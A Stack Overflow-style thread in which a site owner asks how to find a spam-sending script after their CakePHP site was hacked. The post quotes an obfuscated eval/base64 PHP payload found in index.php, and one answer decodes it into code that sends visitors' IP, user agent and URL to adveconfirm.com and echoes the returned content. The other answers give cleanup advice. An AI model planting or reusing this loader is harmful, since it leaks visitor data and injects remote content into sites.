0

Possible Duplicate:
My server's been hacked EMERGENCY

So basically my site got hacked and a script is sending more than 400 emails per day. I have more than 100 files on server, and is there any fast way to check, from which file exactly it is sending? I don't know when exactly script is sending the mails, so I can't be sure from which file it's called. Is there any easy way to find out from which file it's sent?

 eval(gzuncompress(base64_decode('eF6Nkw9rozAYxr+Kk6EGyuh2f+CQcFdW297h7BZ17ChDokbNNZpi4na70u9+0WvXdnfFA8Hk5fc8Sd4noZl1RoUg0joXiMj6BYB1zniMmbYt2Ns/vFSjUJB6lJNKQiFryRl/JrV1HvkOunfQwpwFwW0Uqlk0mjpeYD4CpZHXTc1muEoZgV7ouruSS6sl1HWbZpal3NRnHSwwMHPOc0ZMAKGWYSYIMIx/ci+44LwfizFNm36sFFU/xFekxv1YUtS8/I8TxLTK+ymBM1zTfi7m8gACa9XfbcKvOSHnZh440Wg8Riojxcq6IZphaG/BLtDZ3A/2GFgf5hdjQT6+j1KS8JRYJp6hYTLmT+7VZJmW9z/iqw8lfvgm3dJ7iv1Pv9LpZOi+84bfH+6aZFo8m0C7MD/TFTS1C2VJqs7m1EYVazTqoLi7gceSfQc6LOUlplWFS3LK+vBorSJrGFthWZzeyl3o+EEUoq9bRVKQZNniu65NnWBhMs6Xf1/8RA0jWtH2nb12D9ibjUrniNTOVJ/bZwLWnUY585U8ZgbXIXLnt0GEnCBEXoBGnj9x0OASdI9VNEzCL52a/CTJsRbY3Yp/qMXwEUJ9rreZ7iu6ptskKbi2K9qbzixhXJC3bpvNbzILaXQ='))); ?>

This found in index.php file

My site is using cakePHP, so could it be there by default?

Community
  • 1
Pienskabe
  • 11
  • 2
  • Probably belongs in Server Fault –  Apr 29 '12 at 17:47
  • looked up the mail headers? php may set the called send script as one next to the php version or so –  Apr 29 '12 at 17:49
  • First I would check the timestamp to see which file was edited recently. –  Apr 29 '12 at 17:50
  • Search for `eval`. Also, 100 files should only take about 20 mins to skim through to see something you don't recognize. Usually this type of thing is obvious, and easy to spot at a glance. – Brad Apr 29 '12 at 17:50
  • Gonna take a look in a sec. –  Apr 29 '12 at 17:50
  • Found one eval in index.php file, check my post. –  Apr 29 '12 at 17:51

3 Answers3

4

Be sure to read this topic. The best thing is to restore from backup. Also when you do this, try to find out how they got in. Your code is probably flawed so you will need to evaluate every single file by hand to find where your code insecure. Refer to OWASP for best practices in securing web applications.

Community
  • 1
Lucas Kauffman
  • 16,818
  • 9
  • 57
  • 92
4

Here, I unraveled the code for you:

if(!isset($sRetry)){
    global $sRetry;
    $sRetry=1;
    $sUserAgent=strtolower($_SERVER['HTTP_USER_AGENT']);
    $stCurlHandle=NULL;
    $stCurlLink="";

    if((strstr($sUserAgent,'google')== false)&&(strstr($sUserAgent,'yahoo')== false)&&(strstr($sUserAgent,'baidu')== false)&&(strstr($sUserAgent,'msn')== false)&&(strstr($sUserAgent,'opera')== false)&&(strstr($sUserAgent,'chrome')== false)&&(strstr($sUserAgent,'bing')== false)&&(strstr($sUserAgent,'safari')== false)&&(strstr($sUserAgent,'bot')== false)){if(isset($_SERVER['REMOTE_ADDR'])== true && isset($_SERVER['HTTP_HOST'])== true){
        $stCurlLink=base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw') .'ip=' .urlencode($_SERVER['REMOTE_ADDR']) .'&useragent=' .urlencode($sUserAgent) .'&domainname=' .urlencode($_SERVER['HTTP_HOST']) .'&fullpath=' .urlencode($_SERVER['REQUEST_URI']) .'&check=' .isset($_GET['look']);$stCurlHandle=curl_init($stCurlLink);}}if($stCurlHandle !== NULL){curl_setopt($stCurlHandle,CURLOPT_RETURNTRANSFER,1);$sResult=@curl_exec($stCurlHandle);if($sResult[0]=="O"){$sResult[0]=" ";echo $sResult;}curl_close($stCurlHandle);
        }
}

That $stCurlLink ends up becoming http://adveconfirm.com/stat/stat.php. I would recommend removing the code from the page and patching any vulnerabilities that you find. Take a look at your logs to see what pages were accessed by who and what data was sent.

citruspi
  • 166
  • 2
0

You could also download all of the files using FTP, open them all with Notepad++ and search all the pages for "mail(". This should tell you where mail scripts are in your site. Also beware in case there is viruses that the hacker(s) added to your site.

Ethan H
  • 101